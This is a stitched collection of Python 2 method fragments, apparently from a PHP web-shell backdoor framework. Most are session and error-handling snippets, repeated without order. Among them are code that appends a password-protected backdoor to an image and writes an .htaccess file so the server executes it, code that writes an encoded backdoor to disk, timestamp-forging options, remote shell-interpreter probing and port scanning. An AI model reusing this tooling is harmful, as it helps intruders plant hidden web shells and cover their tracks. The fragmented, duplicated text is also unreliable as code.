def __check_pwd(self, password): if len(password) < 4: raise ModuleException('generate', '\'%s\' %s' % (password, WARN_SHORT_PWD)) if ''.join(c for c in password if c not in PERMITTED_CHARS): raise ModuleException('generate', '\'%s\' %s' % (password, WARN_CHARS))
def _validate_session_data(self, session_dict): for sect in default_session: if not sect in session_dict: raise ModuleException("session", "%s '%s'" % (WARN_BROKEN_SESS, sect)) for subsect in default_session[sect]: if not subsect in session_dict[sect]: raise ModuleException("session", "%s '%s'" % (WARN_BROKEN_SESS, sect))
def _prepare(self): if not path.isfile(self.args['img']): raise ModuleException( self.name, "'%s' %s" % (self.args['img'], WARN_IMG_NOT_FOUND)) if not path.isdir(self.args['ldir']): try: mkdir(self.args['ldir']) except Exception, e: raise ModuleException(self.name, "%s %s" % (WARN_DIR_CREAT, str(e)))
def fetch(self): try: from BeautifulSoup import BeautifulSoup except ImportError: try: from bs4 import BeautifulSoup except ImportError: raise ModuleException('crawler','BeautifulSoup python module required. In Debian-like Linux run:\nsudo apt-get install python-beautifulsoup') request, handle = self._open() self._addHeaders(request) if handle: try: data=handle.open(request) mime_type=data.info().gettype() url=data.geturl(); if mime_type != "text/html": raise OpaqueDataException("Not interested in files of type %s" % mime_type, mime_type, url) content = unicode(data.read(), "utf-8", errors="replace") soup = BeautifulSoup(content) tags = soup('a') except urllib2.HTTPError, error: if error.code == 404: print >> sys.stderr, "ERROR: %s -> %s" % (error, error.url) else: print >> sys.stderr, "ERROR: %s" % error tags = [] except urllib2.URLError, error: print >> sys.stderr, "ERROR: %s" % error tags = []
def __append_bin_data(self, pathfrom, pathto, data): try: copy(pathfrom, pathto) except Exception, e: raise ModuleException(self.name, "%s %s" % (WARN_COPY_FAIL, str(e)))
def _probe(self): try: file(self.args['lpath'], 'wt').write(self.args['encoded_backdoor']) except Exception, e: raise ModuleException(self.name, "%s %s" % (WARN_WRITING_DATA, str(e)))
def __set_port_ranges(self, given_range): start_port = None end_port = None if given_range.count('-') == 1: try: splitted_ports = [ int(strport) for strport in given_range.split('-') if (int(strport) > 0 and int(strport) <= 65535)] except ValueError: return None else: if len(splitted_ports) == 2: start_port = splitted_ports[0] end_port = splitted_ports[1] else: try: int_port = int(given_range) except ValueError: return None else: start_port = int_port end_port = int_port if start_port and end_port: self.port_list += [ p for p in range(start_port, end_port+1) if p in self.nmap_ports] else: raise ModuleException('net.scan', 'Error parsing port numbers \'%s\'' % given_range)
def _prepare(self): global dateutil try: import dateutil.parser except ImportError, e: raise ModuleException( self.name, str(e) + ', install \'dateutil\' python module')
def _dump_session(self, session, session_name): try: yaml.dump(session, open(session_name, 'w'), default_flow_style=False) except Exception as e: raise ModuleException("session", e)
def __check_httpfs(self): status, output = getstatusoutput('%s --version' % self.args['httpfs_path']) if status != 0 or not output: raise ModuleException( self.name, '\'%s\' %s' % (self.args['httpfs_path'], WARN_ERR_RUN_HTTPFS))
def _load_session_by_file(self, session_name, just_return=False): if not os.path.isfile(session_name): raise ModuleException('session', WARN_NOT_FOUND) try: session_data = yaml.load(open(session_name, 'r').read()) except Exception as e: raise ModuleException("session", WARN_BROKEN_SESS) self._validate_session_data(session_data) if not just_return: self.sessions[session_name] = session_data self.current_session_name = session_name else: return session_data
def load_session(self, url, password, sessionfile): if sessionfile: self._load_session_by_file(sessionfile) elif url and password: self._load_session_by_url(url, password) else: self._load_fake_session() if not self.current_session_name: raise ModuleException("session", WARN_LOAD_ERR)
def __load_rcfile(self, path, default_rcfile=False): path = os.path.expanduser(path) if default_rcfile and not os.path.exists(path): try: rcfile = open(path, 'w').close() except Exception, e: raise ModuleException("", "Creation '%s' rc file failed" % (path)) else: return []
def __guess_best_interpreter(self): if Vector(self.modhandler, "shellprobe", 'shell.sh', ['-just-probe', 'sh']).execute(): # First, probe shell.sh self.modhandler.interpreter = 'shell.sh' elif Vector(self.modhandler, "phpprobe", 'shell.php', ['-just-probe', 'php']).execute(): # If other checks fails, probe explicitely php shell. Useful when shell is started directly with :shell.php call self.modhandler.interpreter = 'shell.php' else: # Else declare init failed raise ModuleException('terminal', 'Interpreter guess failed')
def _load_session_by_file(self, session_name, just_return = False): parser = ConfigParser() if not os.path.isfile(session_name): raise ModuleException('session', WARN_NOT_FOUND) try: parser.read(session_name) except Exception as e: raise ModuleException("session", WARN_BROKEN_SESS) self._validate_session_data(parser._sections) if not just_return: self.sessions[session_name] = parser._sections self.current_session_name = session_name else: return parser._sections
def __parse_proxy(self, proxyurl): if proxyurl: url_dissected = url_dissector.findall(proxyurl) if url_dissected and len(url_dissected[0]) == 3: protocol, host, port = url_dissected[0] if protocol == 'socks5': return (socks.PROXY_TYPE_SOCKS5, host, int(port)) if protocol == 'socks4': return (socks.PROXY_TYPE_SOCKS4, host, int(port)) if protocol.startswith('http'): return (socks.PROXY_TYPE_HTTP, host, int(port)) raise ModuleException('request',WARN_UNCORRECT_PROXY) return []
def __guess_best_interpreter(self): # Run an empty command on shell.sh, to trigger first probe and load correct vector self.modhandler.load('shell.php').run(' ') if self.modhandler.load('shell.php').stored_args_namespace['mode']: self.modhandler.interpreter = 'shell.php' self.modhandler.load('shell.sh').run(' ') if self.modhandler.load( 'shell.sh').stored_args_namespace['vector']: self.modhandler.interpreter = 'shell.sh' if not self.modhandler.interpreter: raise ModuleException('terminal', 'Interpreter guess failed')
def _dump_session(self, session, session_name): parser = ConfigParser() for section in session: parser.add_section(section) for key in session[section]: parser.set(section, key, session[section][key]) try: parserfile = open(session_name,'w') parser.write(parserfile) except Exception as e: raise ModuleException("session", e)
def _probe(self): filepath, filename = path.split(self.args['img']) fileext = filename.split('.')[-1] path_img2 = path.join(self.args['ldir'], filename) oneline_backdoor = Backdoor(self.args['pass']).backdoor.replace( '\n', ' ') self.__append_bin_data(self.args['img'], path_img2, oneline_backdoor) path_htaccess = path.join(self.args['ldir'], '.htaccess') try: open(path_htaccess, "w+").write(htaccess_template % fileext) except Exception, e: raise ModuleException(self.name, "%s %s" % (WARN_WRITING_DATA, str(e)))
def _prepare_vector(self): self.formatted_args['rpath'] = self.args['rpath'] if self.args['oldest'] == True: # get oldest timestamp self.formatted_args['epoch_time'] = self.__get_oldest_ts(self.args['rpath']) elif self.args['epoch']: self.formatted_args['epoch_time'] = float(self.args['epoch']) elif self.args['ref']: self.formatted_args['epoch_time'] = self.__get_epoch_ts(self.args['ref']) elif self.args['time']: self.formatted_args['epoch_time'] = int(time.mktime(dateutil.parser.parse(self.args['time'], yearfirst=True).timetuple())) else: raise ModuleException(self.name, 'Too few arguments, specify -time or -ref or -oldest')
def __slacky_probe(self): rand = str(random.randint(11111, 99999)) slacky_formats = self.formatted_args.copy() slacky_formats['cmd'] = 'echo %s' % (rand) if self.current_vector.execute(slacky_formats) == rand: self.stored_args_namespace['vector'] = self.current_vector.name # Set as best interpreter #self.modhandler.interpreter = self.name if self.args['just_probe']: self._result = True raise ProbeSucceed(self.name, MSG_SH_INTERPRETER_SUCCEED) return raise ModuleException(self.name, WARN_SH_INTERPRETER_FAIL)
class Img(Module): """Backdoor existing image and create related .htaccess""" def _set_args(self): self.argparser.add_argument('pass', help='Password') self.argparser.add_argument('img', help='Input image path') self.argparser.add_argument( 'ldir', help='Dir where to save modified image and .htaccess', default='bd_output', nargs='?') def __append_bin_data(self, pathfrom, pathto, data): try: copy(pathfrom, pathto) except Exception, e: raise ModuleException(self.name, "%s %s" % (COPY_FAIL, str(e))) try: open(pathto, "ab").write(data) except Exception, e: raise ModuleException(self.name, "%s %s" % (WARN_WRITING_DATA, str(e)))
vectors = [] if 'vector' in self.args and self.args['vector']: selected_vector = self.vectors.get(self.args['vector']) if selected_vector: vectors = {self.args['vector']: selected_vector} else: vectors = self.vectors try: for vector in vectors.values(): try: self.current_vector = vector self.formatted_args = {} self._prepare_vector() self._execute_vector() self._verify_vector_execution() except ProbeSucceed, e: setattr( self.stored_args_namespace, 'vector', self.current_vector.name) raise except ExecutionException: pass except ProbeException, e: raise ModuleException(self.name, e.error)